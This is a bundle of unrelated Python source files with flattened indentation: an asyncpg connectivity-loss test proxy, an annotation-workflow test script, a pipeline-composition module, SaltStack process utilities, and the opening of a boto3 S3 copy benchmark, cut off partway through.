# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0
import asyncio
import socket
import threading
import typing
from asyncpg import cluster
class StopServer(Exception):
pass
class TCPFuzzingProxy:
def __init__(self, *, listening_addr: str='127.0.0.1',
listening_port: typing.Optional[int]=None,
backend_host: str, backend_port: int,
settings: typing.Optional[dict]=None) -> None:
self.listening_addr = listening_addr
self.listening_port = listening_port
self.backend_host = backend_host
self.backend_port = backend_port
self.settings = settings or {}
self.loop = None
self.connectivity = None
self.connectivity_loss = None
self.stop_event = None
self.connections = {}
self.sock = None
self.listen_task = None
async def _wait(self, work):
work_task = asyncio.ensure_future(work)
stop_event_task = asyncio.ensure_future(self.stop_event.wait())
try:
await asyncio.wait(
[work_task, stop_event_task],
return_when=asyncio.FIRST_COMPLETED)
if self.stop_event.is_set():
raise StopServer()
else:
return work_task.result()
finally:
if not work_task.done():
work_task.cancel()
if not stop_event_task.done():
stop_event_task.cancel()
def start(self):
started = threading.Event()
self.thread = threading.Thread(
target=self._start_thread, args=(started,))
self.thread.start()
if not started.wait(timeout=2):
raise RuntimeError('fuzzer proxy failed to start')
def stop(self):
self.loop.call_soon_threadsafe(self._stop)
self.thread.join()
def _stop(self):
self.stop_event.set()
def _start_thread(self, started_event):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.connectivity = asyncio.Event()
self.connectivity.set()
self.connectivity_loss = asyncio.Event()
self.stop_event = asyncio.Event()
if self.listening_port is None:
self.listening_port = cluster.find_available_port()
self.sock = socket.socket()
self.sock.bind((self.listening_addr, self.listening_port))
self.sock.listen(50)
self.sock.setblocking(False)
try:
self.loop.run_until_complete(self._main(started_event))
finally:
self.loop.close()
async def _main(self, started_event):
self.listen_task = asyncio.ensure_future(self.listen())
# Notify the main thread that we are ready to go.
started_event.set()
try:
await self.listen_task
finally:
for c in list(self.connections):
c.close()
await asyncio.sleep(0.01)
if hasattr(self.loop, 'remove_reader'):
self.loop.remove_reader(self.sock.fileno())
self.sock.close()
async def listen(self):
while True:
try:
client_sock, _ = await self._wait(
self.loop.sock_accept(self.sock))
backend_sock = socket.socket()
backend_sock.setblocking(False)
await self._wait(self.loop.sock_connect(
backend_sock, (self.backend_host, self.backend_port)))
except StopServer:
break
conn = Connection(client_sock, backend_sock, self)
conn_task = self.loop.create_task(conn.handle())
self.connections[conn] = conn_task
def trigger_connectivity_loss(self):
self.loop.call_soon_threadsafe(self._trigger_connectivity_loss)
def _trigger_connectivity_loss(self):
self.connectivity.clear()
self.connectivity_loss.set()
def restore_connectivity(self):
self.loop.call_soon_threadsafe(self._restore_connectivity)
def _restore_connectivity(self):
self.connectivity.set()
self.connectivity_loss.clear()
def reset(self):
self.restore_connectivity()
def _close_connection(self, connection):
conn_task = self.connections.pop(connection, None)
if conn_task is not None:
conn_task.cancel()
class Connection:
def __init__(self, client_sock, backend_sock, proxy):
self.client_sock = client_sock
self.backend_sock = backend_sock
self.proxy = proxy
self.loop = proxy.loop
self.connectivity = proxy.connectivity
self.connectivity_loss = proxy.connectivity_loss
self.proxy_to_backend_task = None
self.proxy_from_backend_task = None
self.is_closed = False
def close(self):
if self.is_closed:
return
self.is_closed = True
if self.proxy_to_backend_task is not None:
self.proxy_to_backend_task.cancel()
self.proxy_to_backend_task = None
if self.proxy_from_backend_task is not None:
self.proxy_from_backend_task.cancel()
self.proxy_from_backend_task = None
self.proxy._close_connection(self)
async def handle(self):
self.proxy_to_backend_task = asyncio.ensure_future(
self.proxy_to_backend())
self.proxy_from_backend_task = asyncio.ensure_future(
self.proxy_from_backend())
try:
await asyncio.wait(
[self.proxy_to_backend_task, self.proxy_from_backend_task],
return_when=asyncio.FIRST_COMPLETED)
finally:
# Asyncio fails to properly remove the readers and writers
# when the task doing recv() or send() is cancelled, so
# we must remove the readers and writers manually before
# closing the sockets.
self.loop.remove_reader(self.client_sock.fileno())
self.loop.remove_writer(self.client_sock.fileno())
self.loop.remove_reader(self.backend_sock.fileno())
self.loop.remove_writer(self.backend_sock.fileno())
self.client_sock.close()
self.backend_sock.close()
async def _read(self, sock, n):
read_task = asyncio.ensure_future(
self.loop.sock_recv(sock, n))
conn_event_task = asyncio.ensure_future(
self.connectivity_loss.wait())
try:
await asyncio.wait(
[read_task, conn_event_task],
return_when=asyncio.FIRST_COMPLETED)
if self.connectivity_loss.is_set():
return None
else:
return read_task.result()
finally:
if not read_task.done():
read_task.cancel()
if not conn_event_task.done():
conn_event_task.cancel()
async def _write(self, sock, data):
write_task = asyncio.ensure_future(
self.loop.sock_sendall(sock, data))
conn_event_task = asyncio.ensure_future(
self.connectivity_loss.wait())
try:
await asyncio.wait(
[write_task, conn_event_task],
return_when=asyncio.FIRST_COMPLETED)
if self.connectivity_loss.is_set():
return None
else:
return write_task.result()
finally:
if not write_task.done():
write_task.cancel()
if not conn_event_task.done():
conn_event_task.cancel()
async def proxy_to_backend(self):
buf = None
try:
while True:
await self.connectivity.wait()
if buf is not None:
data = buf
buf = None
else:
data = await self._read(self.client_sock, 4096)
if data == b'':
break
if self.connectivity_loss.is_set():
if data:
buf = data
continue
await self._write(self.backend_sock, data)
except ConnectionError:
pass
finally:
self.loop.call_soon(self.close)
async def proxy_from_backend(self):
buf = None
try:
while True:
await self.connectivity.wait()
if buf is not None:
data = buf
buf = None
else:
data = await self._read(self.backend_sock, 4096)
if data == b'':
break
if self.connectivity_loss.is_set():
if data:
buf = data
continue
await self._write(self.client_sock, data)
except ConnectionError:
pass
finally:
self.loop.call_soon(self.close)
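# Illustrative usage sketch (an editorial addition, not part of the original
# asyncpg module). It assumes a PostgreSQL-compatible backend is already
# listening on 127.0.0.1:5432; the host, port and sleep interval below are
# placeholder values chosen only for the example.
if __name__ == '__main__':
    import time
    proxy = TCPFuzzingProxy(backend_host='127.0.0.1', backend_port=5432)
    proxy.start()
    try:
        print('proxy listening on {}:{}'.format(
            proxy.listening_addr, proxy.listening_port))
        # Drop connectivity for all proxied connections, then restore it.
        proxy.trigger_connectivity_loss()
        time.sleep(1)
        proxy.restore_connectivity()
    finally:
        proxy.stop()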
|
TestKeywordEmbeddingExtender.py
|
import logging
import sqlalchemy_dao
from sqlalchemy_dao import Dao
from SmartAnno.utils.ConfigReader import ConfigReader
from SmartAnno.db.ORMs import Filter
from SmartAnno.gui.Workflow import Workflow
from SmartAnno.utils.AnnotationTypeDef import AnnotationTypeDef
from SmartAnno.utils.KeywordsFiltering import KeywordsFiltering
from SmartAnno.utils.KeywordsEmbeddingExtender import KeywordsEmbeddingExtender
from SmartAnno.utils.KeywordsEmbeddingExtenderSetup import KeywordsEmbeddingExtenderSetup
logging.getLogger().setLevel(logging.DEBUG)
ConfigReader('../conf/smartanno_conf.json')
from SmartAnno.models.GloveModel import GloveModel
from threading import Thread
def prepareGloveModel():
ConfigReader('../conf/smartanno_conf.json')
glove_path = ConfigReader.getValue('glove/model_path')
glove_vocab = ConfigReader.getValue('glove/vocab')
glove_vector = ConfigReader.getValue('glove/vector')
GloveModel(word2vec_file=glove_path, vocab=glove_vocab, vect=glove_vector)
gm = GloveModel.glove_model
thread_gm = Thread(target=prepareGloveModel)
thread_gm.start()
wf = Workflow(config_file=ConfigReader.config_file)
wf.api_key = ConfigReader.getValue("api_key")
wf.dao = Dao('sqlite+pysqlite:///../data/test.sqlite', sqlalchemy_dao.POOL_DISABLED)
wf.task_name = 'language'
wf.append(AnnotationTypeDef(
    '<h3>Annotation types:</h3><p>List all the types you want to identify below. Each type per line.<br/>If you '
    'have too many types, try setting them up separately, so that you won\'t need to choose from a long list '
    'for each sample. </p>', name='types'))
wf.append(KeywordsFiltering(
name='keywords'))
wf.append(KeywordsEmbeddingExtenderSetup(name='w_e_extender_setup'))
wf.append(KeywordsEmbeddingExtender(name='w_e_extender', max_query=40))
wf.start()
wf.steps[0].complete()
with wf.dao.create_session() as session:
records = session.query(Filter).filter(Filter.task_id == wf.task_id) \
.filter(Filter.type_name == 'Eng')
record = records.first()
record.keyword = 'Eng\nEnglish'
wf.steps[1].complete()
|
pipeline.py
|
from utils.functions import current_time_millis, overrides, get_class_name, deprecated
from threading import Thread
import logging
import numpy as np
from config.config import *
class Pipeline(object):
""" Base object for all pipelines"""
def __init__(self):
self.execute_callbacks = []
self._debug_prefix = ""
self.__succ = False
self.__output = None
def reset_pipeline(self):
self.__succ = False
self.__output = None
@property
def output(self):
return self.__output
@property
def result(self):
return self.success_state, self.output
@property
def debug_prefix(self):
return self._debug_prefix
@property
def success_state(self):
return self.__succ
@debug_prefix.setter
def debug_prefix(self, value):
self._debug_prefix = value
def run_pipeline(self, inp):
self.reset_pipeline()
start = current_time_millis()
succ, out = self._execute(inp)
exectime = current_time_millis() - start
start = current_time_millis()
for cb in self.execute_callbacks:
cb(inp, out)
callbacktime = current_time_millis() - start
logging.debug(self.debug_prefix + "Executing pipeline {} took {}ms (callbacktime: {}ms)".format(
self.__class__.__name__, exectime, callbacktime))
self.__succ = succ
self.__output = out
return out
def _execute(self, inp):
raise NotImplementedError()
def __str__(self):
return "[{}]".format(get_class_name(self))
class CompositePipeline(Pipeline):
def __init__(self, *pipelines):
Pipeline.__init__(self)
self.named_pipelines = {}
self.__pipelines = []
for p in pipelines:
if issubclass(type(p), CompositePipeline): # element is a composite pipeline
self.named_pipelines.update(p.named_pipelines)
self.__pipelines.append(p)
elif issubclass(type(p), Pipeline): # element is a pipeline, but NOT a composite pipeline
self.__pipelines.append(p)
elif type(p) == tuple:
name = p[0]
# check type of first element
if issubclass(type(p[1]), CompositePipeline):
                    self.named_pipelines.update(p[1].named_pipelines)
toappend = p[1]
elif issubclass(type(p[1]), Pipeline):
toappend = p[1]
else:
toappend = AtomicFunctionPipeline(p[1])
if name in self.named_pipelines:
logging.warning("Name '{}' already exists in the CompositePipeline".format(name))
self.named_pipelines[name] = toappend
self.__pipelines.append(toappend)
else:
self.__pipelines.append(AtomicFunctionPipeline(p))
self._results = None
self.debug_prefix = ""
@overrides(Pipeline)
def reset_pipeline(self):
Pipeline.reset_pipeline(self)
for p in self.pipelines:
p.reset_pipeline()
@property
def debug_prefix(self):
return self._debug_prefix
@debug_prefix.setter
def debug_prefix(self, value):
self._debug_prefix = value
for s in self.pipelines:
s.debug_prefix = self.debug_prefix + " "
@property
def pipelines(self):
return self.__pipelines
@property
def results(self):
return self._results
def _execute(self, inp):
raise NotImplementedError()
def __getitem__(self, key):
if type(key) == int:
return self.pipelines[key]
elif type(key) == str:
return self.named_pipelines[key]
else:
raise TypeError()
class EmptyPipeline(Pipeline):
""" A pipeline that does nothing."""
@overrides(Pipeline)
def _execute(self, inp):
return True, inp
class PipelineSequence(CompositePipeline):
""" Chains several pipelines and executes them sequentially"""
def __init__(self, *pipelines):
CompositePipeline.__init__(self, *pipelines)
@overrides(CompositePipeline)
def _execute(self, inp):
self._results = [(True, inp)]
last = inp
run = True
for pipeline in self.pipelines:
            if not run:  # halt the pipeline if one step is not successful
self._results.append((False, None))
else:
last = pipeline.run_pipeline(last)
run = pipeline.success_state
self._results.append((run, last))
return run, last
def __str__(self):
return "[PipelineSequence|{} steps: {}]".format(len(self.pipelines), '->'.join(str(p) for p in self.pipelines))
class AbstractParallelPipeline(CompositePipeline):
def __init__(self, *pipelines):
CompositePipeline.__init__(self, *pipelines)
self.use_parallel = USE_TRUE_PARALLEL_PIPELINES
@overrides(CompositePipeline)
def _execute(self, inp):
        return self._execute_parallel(inp) if self.use_parallel else self._execute_sequential(inp)
def _execute_sequential(self, inp):
results = []
for pipeline in self.pipelines:
out = pipeline.run_pipeline(inp)
succ = pipeline.success_state
results.append((succ, out))
out = self.combine_outputs([p.output for p in self.pipelines])
succ = self.combine_success([p.success_state for p in self.pipelines])
        return succ, out
def _execute_parallel(self, inp):
threads = [Thread(target=p.run_pipeline, args=(inp,)) for p in self.pipelines]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
out = self.combine_outputs([p.output for p in self.pipelines])
succ = self.combine_success([p.success_state for p in self.pipelines])
return succ, out
def combine_outputs(self, outputs):
raise NotImplementedError()
def combine_success(self, successes):
raise NotImplementedError()
class ConjunctiveParallelPipeline(AbstractParallelPipeline):
"""
Runs several pipelines in parallel and then combines their output.
The result is a tuple that contains the success flag, which is true, if all
    pipelines were successful. The second component is a tuple containing
the result tuples of the parallel pipelines.
"""
def __init__(self, *pipelines):
AbstractParallelPipeline.__init__(self, *pipelines)
@overrides(AbstractParallelPipeline)
def combine_outputs(self, outputs):
return tuple(outputs)
@overrides(AbstractParallelPipeline)
def combine_success(self, successes):
return np.all(successes)
def __str__(self):
return "[ConjunctiveParallelPipeline|{} pipelines: {}]".format(
len(self.pipelines), '||'.join(str(p) for p in self.pipelines))
class DisjunctiveParallelPipeline(AbstractParallelPipeline):
"""
Runs several pipelines in parallel and then combines their output.
The result is a tuple that contains the success flag, which is true, if at
    least one pipeline was successful. The second component is a tuple
containing the result tuples of the parallel pipelines.
"""
def __init__(self, *pipelines):
AbstractParallelPipeline.__init__(self, *pipelines)
@overrides(AbstractParallelPipeline)
def combine_outputs(self, outputs):
return tuple(outputs)
@overrides(AbstractParallelPipeline)
def combine_success(self, successes):
return np.any(successes)
def __str__(self):
return "[ConjunctiveParallelPipeline|{} pipelines: {}]".format(
len(self.pipelines), '||'.join(str(p) for p in self.pipelines))
class AtomicFunctionPipeline(Pipeline):
""" A wrapper class that just executes a given funtion """
def __init__(self, func):
Pipeline.__init__(self)
self.__func = func
@overrides(Pipeline)
def _execute(self, inp):
return True, self.__func(inp)
def __str__(self):
return '[AtomicFunctionPipeline|function=' + self.__func.__name__ + ']'
class ConstantPipeline(Pipeline):
""" A wrapper class that just returns the parameter passed in the
constructor. This can be used as an entry point for a pipeline."""
def __init__(self, const):
Pipeline.__init__(self)
self.__const = const
@overrides(Pipeline)
def _execute(self, inp):
""" Ignores the input and returns the object passed in the
constructor"""
return True, self.__const
def __str__(self):
return "[ConstantPipeline|const=" + str(self.__const) + "]"
|
process.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import
import os
import sys
import time
import types
import signal
import subprocess
import logging
import multiprocessing
import multiprocessing.util
import threading
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
import salt.log.setup
from salt.log.mixins import NewStyleClassMixIn
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def systemd_notify_call(action):
process = subprocess.Popen(['systemd-notify', action], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
if salt.utils.which('systemd-notify') and systemd_notify_call('--booted'):
return systemd_notify_call('--ready')
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
    except (KeyError, IndexError):  # pwd.getpwnam raises KeyError for unknown users
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def check_pidfile(pidfile):
'''
Determine if a pidfile has been written out
'''
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
'''
Return the pid from a pidfile as an integer
'''
with salt.utils.fopen(pidfile) as pdf:
pid = pdf.read()
return int(pid)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if isinstance(pid, six.string_types):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now this implementation
Only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
try:
log.debug('ThreadPool executing func: {0} with args:{1}'
' kwargs{2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
def add_process(self, tgt, args=None, kwargs=None):
'''
Create a processes and args + kwargs
        This will determine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if salt.utils.is_windows():
            # Need to ensure that 'log_queue' is correctly transferred to
# processes that inherit from 'MultiprocessingProcess'.
if type(MultiprocessingProcess) is type(tgt) and (
issubclass(tgt, MultiprocessingProcess)):
need_log_queue = True
else:
need_log_queue = False
if need_log_queue and 'log_queue' not in kwargs:
if hasattr(self, 'log_queue'):
kwargs['log_queue'] = self.log_queue
else:
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue())
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs)
process.start()
# create a nicer name for the debug log
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}.{1}.{2}'.format(
tgt.__module__,
tgt.__class__,
tgt.__name__,
)
log.debug("Started '{0}' with pid {1}".format(name, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
return process
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def run(self):
'''
Load and start all available api modules
'''
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
signal.signal(signal.SIGTERM, self.kill_children)
while True:
try:
# in case someone died while we were waiting...
self.check_children()
if not salt.utils.is_windows():
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug('Process of pid {0} died, not a known'
' process, will not restart'.format(pid))
continue
self.restart_process(pid)
else:
# os.wait() is not supported on Windows.
time.sleep(10)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
def check_children(self):
'''
Check the children once
'''
        for pid, mapping in six.iteritems(self._process_map.copy()):  # copy: restart_process mutates the map
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.is_windows():
with open(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', str(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for pid, p_map in six.iteritems(self._process_map.copy()):
try:
p_map['Process'].terminate()
except OSError as exc:
if exc.errno != 3:
raise
del self._process_map[pid]
end_time = time.time() + self.wait_for_kill # when to die
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
p_map['Process'].join(0)
# This is a race condition if a signal was passed to all children
try:
del self._process_map[pid]
except KeyError:
pass
        # forcibly kill any children that are still alive after the grace period
for pid in self._process_map:
try:
                os.kill(pid, signal.SIGKILL)
# in case the process has since decided to die, os.kill returns OSError
except OSError:
pass
class MultiprocessingProcess(multiprocessing.Process, NewStyleClassMixIn):
def __init__(self, *args, **kwargs):
self.log_queue = kwargs.pop('log_queue', salt.log.setup.get_multiprocessing_logging_queue())
multiprocessing.util.register_after_fork(self, MultiprocessingProcess.__setup_process_logging)
super(MultiprocessingProcess, self).__init__(*args, **kwargs)
def __setup_process_logging(self):
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
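# Illustrative ThreadPool sketch (an editorial addition, not part of upstream
# salt). It only demonstrates the fire-and-forget behaviour described in the
# ThreadPool docstring: no results are returned, and fire_async reports False
# instead of blocking when the bounded queue is full. The job function and
# sizes below are made up for the example.
if __name__ == '__main__':
    def _example_job(n):
        log.debug('processing item %s', n)
    pool = ThreadPool(num_threads=2, queue_size=4)
    for item in range(10):
        if not pool.fire_async(_example_job, args=(item,)):
            # Queue was full; a real caller would retry, back off or drop.
            time.sleep(0.1)
    time.sleep(1)  # give the daemonized workers a moment before the interpreter exits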
|
s3cp.py
|
#!/usr/bin/env python
# S3 Operation Examples
import argparse
import random
import sys
import string
import time
import uuid
import Queue
import threading
import boto3
import boto3.session
import boto3.s3.transfer
import botocore
import botocore.config
from collections import defaultdict
from datetime import datetime
from cStringIO import StringIO
# Utilities
VERBOSE_INFO = 0
VERBOSE_DEBUG = 1
VERBOSE_TRACE = 2
VERBOSE_LEVEL = VERBOSE_INFO
def fatal(message=''):
if message:
sys.stderr.write('fatal: %s\n' % message)
sys.stderr.flush()
sys.exit(1)
def warning(message):
sys.stderr.write('warning: %s\n' % message)
sys.stderr.flush()
def info(message):
if VERBOSE_LEVEL >= VERBOSE_INFO:
sys.stderr.write('info: %s\n' % message)
sys.stderr.flush()
def debug(message):
if VERBOSE_LEVEL >= VERBOSE_DEBUG:
sys.stderr.write('debug: %s\n' % message)
sys.stderr.flush()
def trace(message):
if VERBOSE_LEVEL >= VERBOSE_TRACE:
sys.stderr.write('trace: %s\n' % message)
sys.stderr.flush()
def human2bytes(size):
num = int(size.strip('KMGB'))
if size.upper().endswith('KB'): return num * 1024
elif size.upper().endswith('MB'): return num * (1024 ** 2)
elif size.upper().endswith('GB'): return num * (1024 ** 3)
else:
fatal('unknown value: %s' % size)
def bytes2human(num, round2int=False):
format_str = '%.3f%s'
if round2int: format_str = '%d%s'
for unit in ['B', 'KB', 'MB', 'GB', 'TB', 'PB']:
if abs(num) < 1024.0:
return format_str % (num, unit)
num /= 1024.0
return format_str % (num, 'EB')
timer = time.clock if sys.platform == 'win32' else time.time
_elapsed = 0.0
def timing_start():
global _elapsed
_elapsed = timer()
def timing_stop(message=''):
global _elapsed
_elapsed = timer() - _elapsed
if message:
info('%s: %.3f seconds' % (message, _elapsed))
# Parse argument
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-n', '--objects-number', type=int,
dest='objects_nums', default=10, help='number of objects')
parser.add_argument('-s', '--objects-size', type=str,
dest='object_size', default='1MB',
help='objects size in bytes, KB, MB, or GB')
parser.add_argument('-t', '--threads-num', type=int,
default=1, help='number of concurrent threads')
parser.add_argument('-o', '--optimal', action='store_true',
default=False, help='optimal transfer using low-level control')
parser.add_argument('-x', '--max-concurrency', type=int,
default=32, help='maximum concurrency')
parser.add_argument('-d', '--dryrun', help="dry run, nothing will be executed",
action="store_true")
parser.add_argument('-v', "--verbose", metavar='INT', type=int,
default=VERBOSE_LEVEL, help="output verbosity")
parser.add_argument("--clean", dest='clean', action='store_true',
default=False, help="clean and remove buckets")
args = parser.parse_args()
VERBOSE_LEVEL = args.verbose
object_size = human2bytes(args.object_size)
# Get AWS account Information
session = boto3.session.Session()
iam_client = boto3.client('iam')
s3_client = boto3.client('s3')
aws_user_id = iam_client.list_users()['Users'][0]['UserId'] # HOWTO: get user id
aws_region = session.region_name # HOWTO: get profile region
debug('AWS user ID: %s' % aws_user_id)
debug('AWS region: %s' % aws_region)
# Prepare buckets
bucket_name_prefix = ("s3cp-%s-%s" % (\
aws_user_id[0:8],
datetime.now().strftime('%y%m%d'))).lower() # NOTE: bucket name must be lower case
s3 = boto3.resource('s3')
src_bucket = s3.Bucket(bucket_name_prefix + '-from')
dst_bucket = s3.Bucket(bucket_name_prefix + '-to')
debug('source bucket: %s' % src_bucket.name)
debug('destination bucket: %s' % dst_bucket.name)
# Empty and delete buckets
if args.clean:
timing_start()
deleted_objects = 0
for bucket in [src_bucket, dst_bucket]:
try:
for key in bucket.objects.all(): # HOWTO: get all objects
trace('delete object: %s/%s' % (key.bucket_name, key.key))
if not args.dryrun:
key.delete()
deleted_objects += 1
trace('delete bucket: %s' % bucket.name)
if not args.dryrun: bucket.delete()
except botocore.exceptions.ClientError as e:
# HOWTO: catch boto exceptions
if e.response['Error']['Code'] == 'NoSuchBucket':
warning('bucket s3://%s does not exist' % bucket.name)
else:
raise
timing_stop('deleted %d objects' % deleted_objects)
sys.exit(0)
# Create buckets
if not args.dryrun:
timing_start()
for bucket in [src_bucket, dst_bucket]:
try:
bucket.create( # HOWTO: create bucket
CreateBucketConfiguration = {'LocationConstraint': 'us-west-2'},
)
except botocore.exceptions.ClientError as e:
# HOWTO: catch boto exceptions
if e.response['Error']['Code'] == 'BucketAlreadyOwnedByYou':
warning('bucket s3://%s has been created' % bucket.name)
else:
raise
timing_stop('create buckets')
# Create objects
tasks = Queue.Queue(args.threads_num * 2)
def create_objects_by_thread(thread_id):
# HOWTO: each thread should have its own session
# http://boto3.readthedocs.io/en/latest/guide/resources.html#multithreading
session = boto3.session.Session()
if args.optimal:
# HOWTO: low-level control
# http://boto3.readthedocs.io/en/latest/_modules/boto3/s3/transfer.html
client_config = botocore.config.Config(
max_pool_connections=args.max_concurrency)
transfer_config = boto3.s3.transfer.TransferConfig(
multipart_threshold=8 * 1024 * 1024,
multipart_chunksize=8 * 1024 * 1024,
max_concurrency=args.max_concurrency,
num_download_attempts=5,
max_io_queue=100,
io_chunksize=256 * 1024)
client = session.client('s3', config=client_config)
else:
s3 = session.resource('s3')
while True:
key = tasks.get()
content = StringIO('*' * object_size)
trace('thread %d create object: s3://%s/%s' % \
(thread_id, src_bucket.name, key))
if not args.dryrun:
if args.optimal:
client.upload_fileobj(content, src_bucket.name, key,
Config=transfer_config)
else:
obj = s3.Object(src_bucket.name, key)
obj.upload_fileobj(content)
tasks.task_done()
timing_start()
for i in xrange(args.threads_num):
t = threading.Thread(target=create_objects_by_thread, args=(i,))
t.daemon = True
t.start()
for i in xrange(args.objects_nums):
# HOWTO: construct a well distributed key
key = '%s-%s-%d.s3cp' % (
uuid.uuid3(uuid.NAMESPACE_DNS,
(str(99999999 - i) + args.object_size).encode()).hex,
args.object_size, i)
tasks.put(key)
tasks.join()
timing_stop('created %d objects by %d threads' % (args.objects_nums, args.threads_num))
# Copy objects
#with tasks.mutex: tasks.queue.clear()
tasks = Queue.Queue(args.threads_num * 2)
copied_objects = [0] * args.threads_num
def copy_objects_by_thread(thread_id, copied_objects):
# HOWTO: each thread should have its own session
# http://boto3.readthedocs.io/en/latest/guide/resources.html#multithreading
session = boto3.session.Session()
if args.optimal:
# HOWTO: low-level control
# http://boto3.readthedocs.io/en/latest/_modules/boto3/s3/transfer.html
